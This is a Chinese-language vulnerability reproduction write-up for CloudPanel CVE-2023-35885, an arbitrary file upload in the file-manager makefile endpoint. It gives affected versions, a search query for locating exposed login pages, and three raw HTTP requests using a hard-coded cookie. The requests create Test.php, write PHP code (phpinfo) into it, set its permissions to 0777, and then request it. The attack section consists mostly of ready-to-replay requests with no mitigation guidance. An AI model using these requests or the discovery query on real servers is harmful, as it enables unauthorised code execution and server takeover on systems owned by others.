# CloudPanel makefile 任意文件上传漏洞 CVE-2023-35885

## 漏洞描述

CloudPanel是一个免费的基于PHP的高性能服务器控制面板，具有轻量级组件和现代功能，易于使用，且支持多个PHP版本，提供多语言版本切换。

CloudPanel makefile 接口存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。

## 漏洞影响

cloudpanel 2.0.0 >= 2.3.0

## 网络测绘

```
title=="CloudPanel | Log In"
```

## 漏洞复现

登陆页面

![image-20231115102840968](images/image-20231115102840968.png)

poc

```
POST /file-manager/backend/makefile HTTP/1.1
Host: 
Accept: */*
Connection: keep-alive
Cookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM=
Content-Length: 54
Content-Type: application/x-www-form-urlencoded

id=/htdocs/app/files/public/&name=Test.php
```

![image-20231115103123744](images/image-20231115103123744.png)

```
POST /file-manager/backend/text HTTP/1.1
Host: 
Accept: */*
Connection: keep-alive
Cookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM=
Content-Length: 289
Content-Type: application/x-www-form-urlencoded

id=/htdocs/app/files/public/Test.php&content=<?php phpinfo()?>
```

![image-20231115103133858](images/image-20231115103133858.png)

```
POST /file-manager/backend/permissions HTTP/1.1
Host: 
Accept: */*
Connection: keep-alive
Cookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM=
Content-Length: 65
Content-Type: application/x-www-form-urlencoded

id=/htdocs/app/files/public/Test.php&permissions=0777
```

![image-20231115103158786](images/image-20231115103158786.png)

访问

```
/Test.php
```